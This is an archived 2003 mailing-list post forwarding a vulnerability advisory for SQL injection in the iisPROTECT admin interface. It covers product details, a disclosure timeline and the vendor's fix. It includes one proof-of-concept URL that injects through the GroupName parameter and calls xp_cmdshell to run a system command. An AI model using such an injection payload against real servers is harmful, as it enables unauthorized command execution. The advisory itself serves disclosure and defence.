[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030523130935.41622.qmail@cgisecurity.net>
From: bugtraq at cgisecurity.net (bugtraq@...security.net)
Subject: iisPROTECT SQL injection in admin interface
Between this and iDefense's advisory I think we could give this product the
'Irony of the year award'.
>
> Release Date: 23.05.2003
> Application: iisPROTECT v/2.2-r4 (and probably earlier versions)
> Vendor: iisPROTECT
> #536, 425 Carrall St.
> Vancouver, BC,
> V6B6E3, Canada
> http://www.iisprotect.com/
> Category: SQL injection in admin interface
> Risk: Medium-High
> Impact: Arbitrary command execution
> Vendor Status: First notified 15/04-2003 17:36 (+1)
> Fixed 15/04-2003 22:47 (+1)
> Author: Torben 'Gyrniff' Frohn
> email: nn@...niff.dk
>
> Intro
> ====
> >From vendor site: "iisPROTECT is a high performance user authentication,
> password protection and member system".
> iisPROTECT has a webbased admin interface, the interface lacks sanitising on
> almost every variable. Successfully exploited some of the variables can be
> used to inject and execute SQL statements.
> iisPROTECT uses either a MS access file or a MS SQL-server. In the testing
> environment the MS SQL-server solution is chosen.
>
>
> Exploit (Proof of Concept)
> ===================
> The following URL exploits the "GroupName" variable and uses the stored
> procedure "xp_cmdshell" to execute the command "ping":
> http://x.x.x.x/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20master..xp_cmdshell'ping%2010.10.10.11';--
>
> Fix
> ===
> Vendor has fixed this problem.
>
> Credits
> =====
> Vulnerability found by Torben Frohn (Gyrniff)
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists